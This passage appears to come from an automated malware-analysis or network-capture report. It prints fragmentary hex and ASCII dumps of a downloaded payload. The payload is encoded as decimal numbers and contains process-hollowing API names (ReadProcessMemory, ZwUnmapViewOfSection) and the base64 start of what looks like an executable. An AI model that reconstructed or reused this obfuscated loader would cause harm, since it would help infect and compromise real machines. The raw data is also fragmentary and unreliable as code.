                    2021-10-26 16:59:38 UTC2765INData Raw: 20 31 36 33 20 31 33 32 20 32 33 36 20 31 36 33 20 31 36 36 20 32 33 36 20 31 36 33 20 31 38 36 20 32 33 36 20 31 36 33 20 31 35 30 20 32 33 36 20 31 36 33 20 31 33 38 20 32 33 36 20 31 36 33 20 31 33 33 20 32 33 36 20 31 36 34 20 31 33 35 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 37 38 20 32 33 36 20 31 36 33 20 31 33 32 20 32 33 36 20 31 36 33 20 31 33 33 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 33 30 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 38 38 20 30 20 32 32 37 20 31 36 34 20 31 38 39 20 32 32 37 20 31 36 34 20 31 35 32 20 32 32 37 20 31 36 34 20 31 36 38 20 32 32 37 20 31 36 34 20 31 38 36 20 32 32 37 20 31 36 34 20 31 38 38 20 32 32 37 20 31 36 34 20 31 34 32 20 32 32 37 20
                    Data Ascii: 163 132 236 163 166 236 163 186 236 163 150 236 163 138 236 163 133 236 164 135 236 163 137 236 163 178 236 163 132 236 163 133 236 163 137 236 163 130 236 163 137 236 163 188 0 227 164 189 227 164 152 227 164 168 227 164 186 227 164 188 227 164 142 227
                    2021-10-26 16:59:38 UTC2767INData Raw: 34 20 31 38 31 20 31 34 34 20 32 33 34 20 31 38 31 20 31 34 35 20 32 33 34 20 31 38 31 20 31 34 34 20 32 33 34 20 31 38 31 20 31 35 36 20 32 33 34 20 31 38 31 20 31 38 39 20 32 33 34 20 31 38 31 20 31 37 38 20 32 33 34 20 31 38 31 20 31 38 38 20 30 20 32 30 37 20 31 37 32 20 32 30 37 20 31 37 32 20 32 30 38 20 31 37 38 20 32 30 37 20 31 37 34 20 32 30 38 20 31 34 38 20 32 30 38 20 31 33 37 20 32 30 38 20 31 35 39 20 32 30 38 20 31 33 39 20 32 30 37 20 31 37 38 20 32 30 37 20 31 37 32 20 32 30 38 20 31 37 35 20 32 30 38 20 31 36 37 20 32 30 37 20 31 37 38 20 32 30 37 20 31 37 31 20 32 30 37 20 31 38 38 20 30 20 32 33 32 20 31 33 30 20 31 38 37 20 32 33 32 20 31 32 39 20 31 38 34 20 32 33 32 20 31 33 30 20 31 35 32 20 32 33 32 20 31 32 39 20 31 38 37 20 32
                    Data Ascii: 4 181 144 234 181 145 234 181 144 234 181 156 234 181 189 234 181 178 234 181 188 0 207 172 207 172 208 178 207 174 208 148 208 137 208 159 208 139 207 178 207 172 208 175 208 167 207 178 207 171 207 188 0 232 130 187 232 129 184 232 130 152 232 129 187 2
                    2021-10-26 16:59:38 UTC2768INData Raw: 20 32 32 38 20 31 35 36 20 31 38 39 20 32 32 38 20 31 35 37 20 31 35 31 20 32 32 38 20 31 35 37 20 31 34 35 20 32 32 38 20 31 35 37 20 31 37 31 20 32 32 38 20 31 35 37 20 31 38 33 20 32 32 38 20 31 35 36 20 31 38 36 20 32 32 38 20 31 35 37 20 31 36 39 20 32 32 38 20 31 35 37 20 31 37 38 20 32 32 38 20 31 35 36 20 31 38 39 20 30 20 32 33 35 20 31 37 35 20 31 37 36 20 32 33 35 20 31 37 35 20 31 37 31 20 32 33 35 20 31 37 35 20 31 37 31 20 32 33 35 20 31 37 35 20 31 32 39 20 32 33 35 20 31 37 35 20 31 35 37 20 32 33 35 20 31 37 35 20 31 32 39 20 32 33 35 20 31 37 35 20 31 36 31 20 32 33 35 20 31 37 34 20 31 38 37 20 32 33 35 20 31 37 35 20 31 38 35 20 32 33 35 20 31 37 35 20 31 33 31 20 32 33 35 20 31 37 35 20 31 35 32 20 32 33 35 20 31 37 35 20 31 35 37 20
                    Data Ascii: 228 156 189 228 157 151 228 157 145 228 157 171 228 157 183 228 156 186 228 157 169 228 157 178 228 156 189 0 235 175 176 235 175 171 235 175 171 235 175 129 235 175 157 235 175 129 235 175 161 235 174 187 235 175 185 235 175 131 235 175 152 235 175 157
                    2021-10-26 16:59:38 UTC2769INData Raw: 31 20 31 38 39 20 30 20 32 31 30 20 31 36 32 20 32 31 31 20 31 34 34 20 32 31 30 20 31 36 36 20 32 31 30 20 31 38 39 20 32 31 30 20 31 36 35 20 32 31 30 20 31 34 33 20 32 31 30 20 31 34 31 20 32 31 30 20 31 34 32 20 32 31 30 20 31 34 35 20 32 31 30 20 31 39 31 20 32 31 31 20 31 34 32 20 32 31 30 20 31 34 37 20 32 31 30 20 31 34 30 20 32 31 31 20 31 32 39 20 32 31 30 20 31 38 39 20 30 20 32 31 38 20 31 37 30 20 32 31 37 20 31 38 35 20 32 31 38 20 31 39 30 20 32 31 37 20 31 38 37 20 32 31 37 20 31 38 35 20 32 31 38 20 31 35 36 20 32 31 39 20 31 32 38 20 32 31 38 20 31 34 30 20 32 31 38 20 31 32 38 20 32 31 38 20 31 34 31 20 32 31 37 20 31 38 39 20 32 31 39 20 31 32 38 20 32 31 38 20 31 32 38 20 32 31 37 20 31 38 36 20 32 31 37 20 31 38 39 20 30 20 32 32 35
                    Data Ascii: 1 189 0 210 162 211 144 210 166 210 189 210 165 210 143 210 141 210 142 210 145 210 191 211 142 210 147 210 140 211 129 210 189 0 218 170 217 185 218 190 217 187 217 185 218 156 219 128 218 140 218 128 218 141 217 189 219 128 218 128 217 186 217 189 0 225
                    2021-10-26 16:59:38 UTC2771INData Raw: 32 36 20 31 37 31 20 31 33 35 20 32 32 36 20 31 37 31 20 31 37 30 20 32 32 36 20 31 37 31 20 31 37 32 20 32 32 36 20 31 37 30 20 31 38 34 20 32 32 36 20 31 37 31 20 31 33 36 20 32 32 36 20 31 37 30 20 31 38 37 20 32 32 36 20 31 37 30 20 31 38 38 20 32 32 36 20 31 37 30 20 31 38 39 20 32 32 36 20 31 37 31 20 31 33 36 20 32 32 36 20 31 37 31 20 31 36 37 20 32 32 36 20 31 37 30 20 31 39 30 20 32 32 36 20 31 37 30 20 31 38 39 20 32 32 36 20 31 37 30 20 31 39 30 20 30 20 32 32 34 20 31 37 34 20 31 33 31 20 32 32 34 20 31 37 34 20 31 37 35 20 32 32 34 20 31 37 34 20 31 33 31 20 32 32 34 20 31 37 34 20 31 32 38 20 32 32 34 20 31 37 35 20 31 32 38 20 32 32 34 20 31 37 34 20 31 35 35 20 32 32 34 20 31 37 34 20 31 37 32 20 32 32 34 20 31 37 34 20 31 33 30 20 32 32
                    Data Ascii: 26 171 135 226 171 170 226 171 172 226 170 184 226 171 136 226 170 187 226 170 188 226 170 189 226 171 136 226 171 167 226 170 190 226 170 189 226 170 190 0 224 174 131 224 174 175 224 174 131 224 174 128 224 175 128 224 174 155 224 174 172 224 174 130 22
                    2021-10-26 16:59:38 UTC2772INData Raw: 38 20 31 39 30 20 31 38 39 20 32 32 38 20 31 39 30 20 31 38 35 20 32 32 38 20 31 39 31 20 31 34 38 20 32 32 38 20 31 39 30 20 31 38 35 20 32 32 38 20 31 39 31 20 31 37 32 20 32 32 38 20 31 39 31 20 31 38 31 20 32 32 38 20 31 39 30 20 31 38 36 20 32 32 38 20 31 39 31 20 31 38 32 20 32 32 38 20 31 39 31 20 31 37 33 20 32 32 38 20 31 39 30 20 31 39 30 20 30 20 32 31 33 20 31 35 36 20 32 31 34 20 31 36 33 20 32 31 33 20 31 36 31 20 32 31 33 20 31 36 34 20 32 31 33 20 31 36 33 20 32 31 34 20 31 34 35 20 32 31 34 20 31 33 30 20 32 31 33 20 31 36 33 20 32 31 33 20 31 36 33 20 32 31 34 20 31 34 36 20 32 31 33 20 31 36 30 20 32 31 33 20 31 36 33 20 32 31 33 20 31 35 39 20 32 31 33 20 31 36 30 20 32 31 33 20 31 39 30 20 30 20 32 32 37 20 31 32 39 20 31 34 33 20 32
                    Data Ascii: 8 190 189 228 190 185 228 191 148 228 190 185 228 191 172 228 191 181 228 190 186 228 191 182 228 191 173 228 190 190 0 213 156 214 163 213 161 213 164 213 163 214 145 214 130 213 163 213 163 214 146 213 160 213 163 213 159 213 160 213 190 0 227 129 143 2
                    2021-10-26 16:59:38 UTC2773INData Raw: 20 32 33 31 20 31 36 38 20 31 36 37 20 32 33 31 20 31 36 38 20 31 37 34 20 32 33 31 20 31 36 39 20 31 32 39 20 32 33 31 20 31 36 38 20 31 34 32 20 32 33 31 20 31 36 38 20 31 35 39 20 32 33 31 20 31 36 38 20 31 35 30 20 32 33 31 20 31 36 38 20 31 34 39 20 32 33 31 20 31 36 39 20 31 32 39 20 32 33 31 20 31 36 39 20 31 33 30 20 32 33 31 20 31 36 39 20 31 34 35 20 32 33 31 20 31 36 38 20 31 34 36 20 32 33 31 20 31 36 38 20 31 39 31 20 30 20 32 33 31 20 31 36 39 20 31 37 33 20 32 33 31 20 31 36 39 20 31 34 33 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 39 20 31 37 35 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 39 20 31 36 35 20 32 33 31 20 31 36 39 20 31 37 38 20 32 33 31 20 31 36 38 20 31 39 31 20
                    Data Ascii: 231 168 167 231 168 174 231 169 129 231 168 142 231 168 159 231 168 150 231 168 149 231 169 129 231 169 130 231 169 145 231 168 146 231 168 191 0 231 169 173 231 169 143 231 168 191 231 169 175 231 168 191 231 168 191 231 169 165 231 169 178 231 168 191
                    2021-10-26 16:59:38 UTC2774INData Raw: 20 31 30 34 20 30 20 31 31 34 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 32 30 20 30 20 31 31 36 20 30 20 30 20 33 35 20 38 32 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 30 30 20 30 20 38 30 20 30 20 31 31 34 20 30 20 31 31 31 20 30 20 39 39 20 30 20 31 30 31 20 30 20 31 31 35 20 30 20 31 31 35 20 30 20 37 37 20 30 20 31 30 31 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 31 31 34 20 30 20 31 32 31 20 30 20 30 20 34 31 20 39 30 20 30 20 31 31 39 20 30 20 38 35 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 39 37 20 30 20 31 31 32 20 30 20 38 36 20 30 20 31 30 35 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 37 39 20 30 20 31 30 32 20 30 20 38 33 20 30
                    Data Ascii: 104 0 114 0 101 0 97 0 100 0 67 0 111 0 110 0 116 0 101 0 120 0 116 0 0 35 82 0 101 0 97 0 100 0 80 0 114 0 111 0 99 0 101 0 115 0 115 0 77 0 101 0 109 0 111 0 114 0 121 0 0 41 90 0 119 0 85 0 110 0 109 0 97 0 112 0 86 0 105 0 101 0 119 0 79 0 102 0 83 0
                    2021-10-26 16:59:38 UTC2776INData Raw: 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 34 37 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 36 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20
                    Data Ascii: 9 0 65 0 65 0 65 0 65 0 47 0 47 0 56 0 65 0 65 0 76 0 103 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0
                    2021-10-26 16:59:38 UTC2777INData Raw: 32 32 20 30 20 37 35 20 30 20 31 30 35 20 30 20 31 30 39 20 30 20 38 32 20 30 20 31 31 35 20 30 20 31 31 39 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 35 34 20 30 20 39 38 20 30 20 37 37 20 30 20 31 31 33 20 30 20 37 35 20 30 20 39 30 20 30 20 37 31 20 30 20 31 32 32 20 30 20 38 35 20 30 20 31 30 39 20 30 20 31 30 38 20 30 20 31 30 36 20 30 20 39 37 20 30 20 36 37 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 31 30 37 20 30 20 39 38 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36
                    Data Ascii: 22 0 75 0 105 0 109 0 82 0 115 0 119 0 122 0 118 0 54 0 98 0 77 0 113 0 75 0 90 0 71 0 122 0 85 0 109 0 108 0 106 0 97 0 67 0 115 0 112 0 107 0 98 0 77 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 6
                    2021-10-26 16:59:38 UTC2778INData Raw: 35 32 20 30 20 37 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35
                    Data Ascii: 52 0 73 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 66 0 119 0 119 0 119 0 65 0 65 0 72 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                    2021-10-26 16:59:38 UTC2780INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 37 20 30 20 35 33 20 30 20 31 32 31 20 30 20 39 39 20 30 20 35 31 20 30 20 37 34 20 30 20 31 30 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 38 31 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30
                    Data Ascii: 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 119 0 67 0 53 0 121 0 99 0 51 0 74 0 106 0 65 0 65 0 65 0 65 0 68 0 71 0 69 0 65 0 65 0 65 0 68 0 81 0 65 0 81 0 65 0 65 0 89 0 103 0 65 0 65 0 65 0 79 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0
                    2021-10-26 16:59:38 UTC2781INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20
                    Data Ascii: 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                    2021-10-26 16:59:38 UTC2782INData Raw: 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 30 20 30 20 37 30 20 30 20 38 37 20 30 20 37 37 20 30 20 34 37 20 30 20 39 30 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 38 34 20 30 20 37 39 20 30 20 37 35 20 30 20 36 36 20 30 20 34 33 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 37 38 20 30 20 36 39 20 30 20 37 34 20 30 20 31 30 39 20 30 20 36 38 20 30 20 35 35 20 30 20 39 38 20 30 20 36 35 20 30 20 31 31 37 20 30 20 31 30 32 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 34 20 30 20 31 32 32 20 30 20 31 30 39 20 30 20 38 39 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20
                    Data Ascii: 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 70 0 87 0 76 0 55 0 70 0 70 0 87 0 77 0 47 0 90 0 109 0 105 0 84 0 79 0 75 0 66 0 43 0 115 0 112 0 78 0 69 0 74 0 109 0 68 0 55 0 98 0 65 0 117 0 102 0 73 0 65 0 65 0 65 0 65 0 114 0 122 0 109 0 89 0 122 0 119 0
                    2021-10-26 16:59:38 UTC2784INData Raw: 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 36 39 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 31 30 34 20 30 20 37 33 20 30 20 36 38 20 30 20 35 32 20 30 20 38 35 20 30 20 31 31 38 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 31 32 32 20 30 20 35 31 20 30 20 38 31 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 35 35 20 30 20 31 30 32 20 30 20 38 39 20 30 20 39 37 20 30 20 37 39 20 30 20 31 31 39 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20
                    Data Ascii: 5 0 65 0 65 0 65 0 43 0 69 0 105 0 119 0 65 0 65 0 65 0 69 0 104 0 73 0 68 0 52 0 85 0 118 0 65 0 103 0 65 0 65 0 105 0 48 0 85 0 81 0 105 0 122 0 51 0 81 0 119 0 85 0 65 0 65 0 68 0 55 0 102 0 89 0 97 0 79 0 119 0 68 0 65 0 65 0 68 0 47 0 100 0 104 0 68
                    2021-10-26 16:59:38 UTC2785INData Raw: 34 38 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 30 20 30 20 38 32 20 30 20 34 39 20 30 20 31 31 33 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 35 31 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 32 20 30 20 31 31 30 20 30 20 38 35 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 31 30 33 20 30 20 37 37 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 38 20 30 20 31 32 32 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 32 20 30 20 39 39 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 30 20 30 20 39 37 20 30 20 36 38 20 30 20 38 30 20 30 20 38 34 20 30 20 36 38
                    Data Ascii: 48 0 85 0 77 0 100 0 82 0 49 0 113 0 65 0 80 0 56 0 86 0 51 0 77 0 66 0 65 0 65 0 71 0 112 0 110 0 85 0 80 0 56 0 86 0 103 0 77 0 70 0 65 0 65 0 70 0 68 0 47 0 70 0 88 0 122 0 66 0 81 0 65 0 68 0 112 0 99 0 102 0 47 0 47 0 47 0 50 0 97 0 68 0 80 0 84 0 68
                    2021-10-26 16:59:38 UTC2786INData Raw: 30 20 37 31 20 30 20 39 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 34 33 20 30 20 37 30 20 30 20 31 31 33 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 35 31 20 30 20 31 31 39 20 30 20 38 36 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 39 39 20 30 20 38 34 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 31 36 20 30 20 31 30 36 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 32 20 30 20 31 31 32 20 30 20 31
                    Data Ascii: 0 71 0 97 0 70 0 119 0 65 0 43 0 70 0 113 0 119 0 65 0 65 0 65 0 65 0 43 0 51 0 119 0 86 0 68 0 47 0 100 0 104 0 68 0 47 0 70 0 99 0 84 0 66 0 81 0 65 0 68 0 47 0 116 0 106 0 119 0 69 0 65 0 65 0 68 0 47 0 70 0 86 0 122 0 65 0 81 0 65 0 68 0 112 0 112 0 1
                    2021-10-26 16:59:38 UTC2788INData Raw: 36 20 30 20 35 30 20 30 20 31 31 31 20 30 20 34 38 20 30 20 39 37 20 30 20 36 37 20 30 20 36 38 20 30 20 37 34 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 33 20 30 20 31 32 32 20 30 20 35 30 20 30 20 34 37 20 30 20 35 36 20 30 20 38 36 20 30 20 37 36 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 35 20 30 20 35 37 20 30 20 37 32 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 31 31 39 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 38 20 30 20 37 33 20 30 20 35 32 20 30 20 34 39 20 30 20 37 30 20 30 20 35 33 20 30 20 37 30 20 30 20 36 36 20 30 20 38 37 20 30 20 34 37 20 30 20 31 32
                    Data Ascii: 6 0 50 0 111 0 48 0 97 0 67 0 68 0 74 0 81 0 65 0 68 0 47 0 100 0 81 0 103 0 122 0 50 0 47 0 56 0 86 0 76 0 77 0 66 0 65 0 65 0 73 0 115 0 57 0 72 0 77 0 66 0 65 0 65 0 73 0 118 0 119 0 104 0 102 0 90 0 48 0 73 0 52 0 49 0 70 0 53 0 70 0 66 0 87 0 47 0 12
                    2021-10-26 16:59:38 UTC2789INData Raw: 31 20 30 20 35 32 20 30 20 34 39 20 30 20 34 39 20 30 20 35 34 20 30 20 37 39 20 30 20 31 30 36 20 30 20 35 31 20 30 20 38 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 38 20 30 20 34 39 20 30 20 35 33 20 30 20 39 38 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 30 20 30 20 37 38 20 30 20 38 38 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 34 20 30 20 31 31 31 20 30 20 35 34 20 30 20 37 37 20 30 20 38 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 37 33 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 37 32 20 30 20 38 31 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 35 37 20 30 20 31 31 35 20 30 20 35 33 20 30 20 38 38 20 30 20 31 30 34
                    Data Ascii: 1 0 52 0 49 0 49 0 54 0 79 0 106 0 51 0 81 0 81 0 65 0 65 0 88 0 49 0 53 0 98 0 121 0 99 0 73 0 69 0 65 0 70 0 78 0 88 0 105 0 47 0 104 0 111 0 54 0 77 0 82 0 65 0 65 0 73 0 80 0 73 0 47 0 43 0 103 0 72 0 81 0 103 0 65 0 65 0 77 0 57 0 115 0 53 0 88 0 104
                    2021-10-26 16:59:38 UTC2791INData Raw: 31 31 31 20 30 20 37 37 20 30 20 31 30 37 20 30 20 38 33 20 30 20 36 35 20 30 20 36 36 20 30 20 36 36 20 30 20 37 39 20 30 20 35 36 20 30 20 31 31 32 20 30 20 35 36 20 30 20 35 35 20 30 20 35 36 20 30 20 37 38 20 30 20 38 34 20 30 20 38 36 20 30 20 31 30 38 20 30 20 31 30 32 20 30 20 34 37 20 30 20 37 30 20 30 20 39 37 20 30 20 36 38 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 36 20 30 20 35 31 20 30 20 34 33 20 30 20 31 30 33 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 35 37 20 30 20 34 38 20 30 20 37 33 20 30 20 34 33 20 30
                    Data Ascii: 111 0 77 0 107 0 83 0 65 0 66 0 66 0 79 0 56 0 112 0 56 0 55 0 56 0 78 0 84 0 86 0 108 0 102 0 47 0 70 0 97 0 68 0 65 0 81 0 65 0 67 0 76 0 100 0 67 0 81 0 81 0 105 0 47 0 105 0 76 0 51 0 43 0 103 0 69 0 81 0 65 0 65 0 65 0 104 0 102 0 57 0 48 0 73 0 43 0
                    2021-10-26 16:59:38 UTC2792INData Raw: 37 38 20 30 20 38 32 20 30 20 39 38 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 37 38 20 30 20 31 30 36 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 37 20 30 20 36 37 20 30 20 36 38 20 30 20 38 30 20 30 20 36 35 20 30 20 37 39 20 30 20 38 35 20 30 20 39 39 20 30 20 39 39 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 39 39 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 31 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 30 33 20 30 20 31 32 30 20 30 20 34 38 20 30 20 38 38 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 30 20 30 20 35 30 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 30
